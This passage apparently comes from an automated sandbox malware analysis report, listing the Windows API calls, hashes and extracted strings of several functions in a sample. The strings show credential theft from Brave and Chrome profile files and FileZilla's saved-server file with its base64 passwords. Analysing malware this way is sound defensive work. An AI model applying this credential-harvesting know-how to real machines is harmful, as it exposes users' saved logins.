                                • lstrlen.KERNEL32(?), ref: 006CDDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 006CDDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDE19
                                • lstrlen.KERNEL32(006F1794), ref: 006CDE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CDE6F
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CDE7B
                                • lstrlen.KERNEL32(00F18C30), ref: 006CDE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDEBB
                                • lstrlen.KERNEL32(006F1794), ref: 006CDEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CDEE6
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CDEF2
                                • lstrlen.KERNEL32(00F18950), ref: 006CDF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDFA5
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CDFB1
                                • lstrlen.KERNEL32(00F18C30), ref: 006CDFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDFF4
                                • lstrlen.KERNEL32(006F1794), ref: 006CDFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE022
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CE02E
                                • lstrlen.KERNEL32(00F18950), ref: 006CE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 006CE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 006CE0E7
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CE11F
                                • lstrlen.KERNEL32(00F1EFF0), ref: 006CE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE155
                                • lstrcat.KERNEL32(00000000,?), ref: 006CE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE19F
                                • lstrcat.KERNEL32(00000000), ref: 006CE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 006CE1F9
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CE22F
                                • lstrlen.KERNEL32(00F18A10), ref: 006CE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE261
                                • lstrcat.KERNEL32(00000000,00F18A10), ref: 006CE269
                                • lstrlen.KERNEL32(\Brave\Preferences), ref: 006CE274
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE29B
                                • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 006CE2A7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE2CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE30F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE349
                                • DeleteFileA.KERNEL32(?), ref: 006CE381
                                • StrCmpCA.SHLWAPI(?,00F1EF48), ref: 006CE3AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE3F4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE41C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE445
                                • StrCmpCA.SHLWAPI(?,00F18950), ref: 006CE468
                                • StrCmpCA.SHLWAPI(?,00F18C30), ref: 006CE47D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE4D9
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006CE4E0
                                • StrCmpCA.SHLWAPI(?,00F1F038), ref: 006CE58E
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CE5C4
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 006CE639
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE678
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE6A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE6C7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE70E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE737
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE75C
                                • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 006CE776
                                • DeleteFileA.KERNEL32(?), ref: 006CE7D2
                                • StrCmpCA.SHLWAPI(?,00F18970), ref: 006CE7FC
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE88C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE8B5
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE8EE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE916
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE952
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 2635522530-726946144
                                • Opcode ID: 3daab669580c9a76ae5fb0e6d7834d76625f096055e4ec61935ee2abd3e36e13
                                • Instruction ID: 156896eacefcfa5ec2528e58e0b3241ec4614292636b7debe49a52e9148c1b20
                                • Opcode Fuzzy Hash: 3daab669580c9a76ae5fb0e6d7834d76625f096055e4ec61935ee2abd3e36e13
                                • Instruction Fuzzy Hash: EB922671A1160A9BCB60AFB5D889FBE77BAFF44300F04452CF84AA7251DB34E945CB90
                                Function 006D18A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D18D2
                                • lstrlen.KERNEL32(\*.*), ref: 006D18DD
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D18FF
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 006D190B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1932
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006D1947
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006D1967
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006D1981
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D19BF
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D19F2
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D1A1A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D1A25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1A4C
                                • lstrlen.KERNEL32(006F1794), ref: 006D1A5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1A80
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1AB4
                                • lstrlen.KERNEL32(?), ref: 006D1AC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1AE5
                                • lstrcat.KERNEL32(00000000,?), ref: 006D1AF3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1B19
                                • lstrlen.KERNEL32(00F18A20), ref: 006D1B2F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1B59
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D1B64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1B8F
                                • lstrlen.KERNEL32(006F1794), ref: 006D1BA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1BC3
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D1BCF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1BF8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1C25
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D1C30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1C57
                                • lstrlen.KERNEL32(006F1794), ref: 006D1C69
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1C8B
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D1C97
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1CC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1CEF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D1CFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1D21
                                • lstrlen.KERNEL32(006F1794), ref: 006D1D33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1D55
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D1D61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1D8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1DB9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D1DC4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1DED
                                • lstrlen.KERNEL32(006F1794), ref: 006D1E19
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1E36
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D1E42
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1E68
                                • lstrlen.KERNEL32(00F1F098), ref: 006D1E7E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1EB2
                                • lstrlen.KERNEL32(006F1794), ref: 006D1EC6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1EE3
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D1EEF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1F15
                                • lstrlen.KERNEL32(00F1F460), ref: 006D1F2B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1F5F
                                • lstrlen.KERNEL32(006F1794), ref: 006D1F73
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1F90
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D1F9C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1FC2
                                • lstrlen.KERNEL32(00F0A6B0), ref: 006D1FD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2000
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D200B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2036
                                • lstrlen.KERNEL32(006F1794), ref: 006D2048
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2067
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D2073
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2098
                                • lstrlen.KERNEL32(?), ref: 006D20AC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D20D0
                                • lstrcat.KERNEL32(00000000,?), ref: 006D20DE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2103
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D213F
                                • lstrlen.KERNEL32(00F1EFF0), ref: 006D214E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2176
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D2181
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                • String ID: \*.*
                                • API String ID: 712834838-1173974218
                                • Opcode ID: 152e005e54570fe74b7ed4f1e604b862090ad74bbd615e747004a2dcdaff2519
                                • Instruction ID: 052c4e8ff05b515ecc8afc76e4cc1596348708ccb4b8ac3a940a947ae3259112
                                • Opcode Fuzzy Hash: 152e005e54570fe74b7ed4f1e604b862090ad74bbd615e747004a2dcdaff2519
                                • Instruction Fuzzy Hash: 8662397191161BABCB22ABA6CC58FBE76BBBF45700F040129F8099B351DF74D945CBA0
                                Function 006D3910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 006D392C
                                • FindFirstFileA.KERNEL32(?,?), ref: 006D3943
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006D396C
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006D3986
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D39BF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D39E7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D39F2
                                • lstrlen.KERNEL32(006F1794), ref: 006D39FD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3A1A
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D3A26
                                • lstrlen.KERNEL32(?), ref: 006D3A33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3A53
                                • lstrcat.KERNEL32(00000000,?), ref: 006D3A61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3A8A
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D3ACE
                                • lstrlen.KERNEL32(?), ref: 006D3AD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3B05
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D3B10
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3B36
                                • lstrlen.KERNEL32(006F1794), ref: 006D3B48
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3B6A
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D3B76
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3B9E
                                • lstrlen.KERNEL32(?), ref: 006D3BB2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3BD2
                                • lstrcat.KERNEL32(00000000,?), ref: 006D3BE0
                                • lstrlen.KERNEL32(00F18A10), ref: 006D3C0B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3C31
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D3C3C
                                • lstrlen.KERNEL32(00F18A20), ref: 006D3C5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3C84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D3C8F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3CB7
                                • lstrlen.KERNEL32(006F1794), ref: 006D3CC9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3CE8
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D3CF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3D1A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D3D47
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D3D52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3D79
                                • lstrlen.KERNEL32(006F1794), ref: 006D3D8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3DAD
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D3DB9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3DE2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3E11
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D3E1C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3E43
                                • lstrlen.KERNEL32(006F1794), ref: 006D3E55
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3E77
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D3E83
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3EAC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3EDB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D3EE6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3F0D
                                • lstrlen.KERNEL32(006F1794), ref: 006D3F1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3F41
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D3F4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3F75
                                • lstrlen.KERNEL32(?), ref: 006D3F89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3FA9
                                • lstrcat.KERNEL32(00000000,?), ref: 006D3FB7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3FE0
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D401F
                                • lstrlen.KERNEL32(00F1EFF0), ref: 006D402E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4056
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D4061
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D408A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D40CE
                                • lstrcat.KERNEL32(00000000), ref: 006D40DB
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006D42D9
                                • FindClose.KERNEL32(00000000), ref: 006D42E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 1006159827-1013718255
                                • Opcode ID: b410499a11273857a933e01a851d92afc05c79a36a0935f68cb43d3b4017583c
                                • Instruction ID: 8ef2d56814a64a334c9d9f3cefd0370d990eaddff6ad49f885a8e55036247ac3
                                • Opcode Fuzzy Hash: b410499a11273857a933e01a851d92afc05c79a36a0935f68cb43d3b4017583c
                                • Instruction Fuzzy Hash: CE623871911626ABCB21ABB6D859FBE77BABF44300F044129F849A7350DF34EE41CB91
                                Function 006D6960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6995
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006D69C8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6A29
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D6A34
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6A5D
                                • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 006D6A77
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6A99
                                • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 006D6AA5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6AD0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6B00
                                • LocalAlloc.KERNEL32(00000040,?), ref: 006D6B35
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6B9D
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6BCD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 313953988-555421843
                                • Opcode ID: 74c0c7dc415a427a0264fa8cf6a68947915d722903927157998a00fdeb8a3c20
                                • Instruction ID: 48a4e5da17b4d175da0e65c1979e543c315222a48727045d06fe3020fb4d1c57
                                • Opcode Fuzzy Hash: 74c0c7dc415a427a0264fa8cf6a68947915d722903927157998a00fdeb8a3c20
                                • Instruction Fuzzy Hash: D7424871A11616ABCB21ABB5DC99FBEBABAEF44700F044429F849E7351DF34D901CB60
                                Function 006CDB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CDBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDBEF
                                • lstrlen.KERNEL32(006F4CA8), ref: 006CDBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDC17
                                • lstrcat.KERNEL32(00000000,006F4CA8), ref: 006CDC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDC4C
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CDC8F
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CDCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006CDCD0
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006CDCF0
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006CDD0A
                                • lstrlen.KERNEL32(006ECFEC), ref: 006CDD1D
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CDD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDD7B
                                • lstrlen.KERNEL32(006F1794), ref: 006CDD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDDA3
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CDDAF
                                • lstrlen.KERNEL32(?), ref: 006CDDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 006CDDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDE19
                                • lstrlen.KERNEL32(006F1794), ref: 006CDE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CDE6F
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CDE7B
                                • lstrlen.KERNEL32(00F18C30), ref: 006CDE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDEBB
                                • lstrlen.KERNEL32(006F1794), ref: 006CDEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CDEE6
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CDEF2
                                • lstrlen.KERNEL32(00F18950), ref: 006CDF01
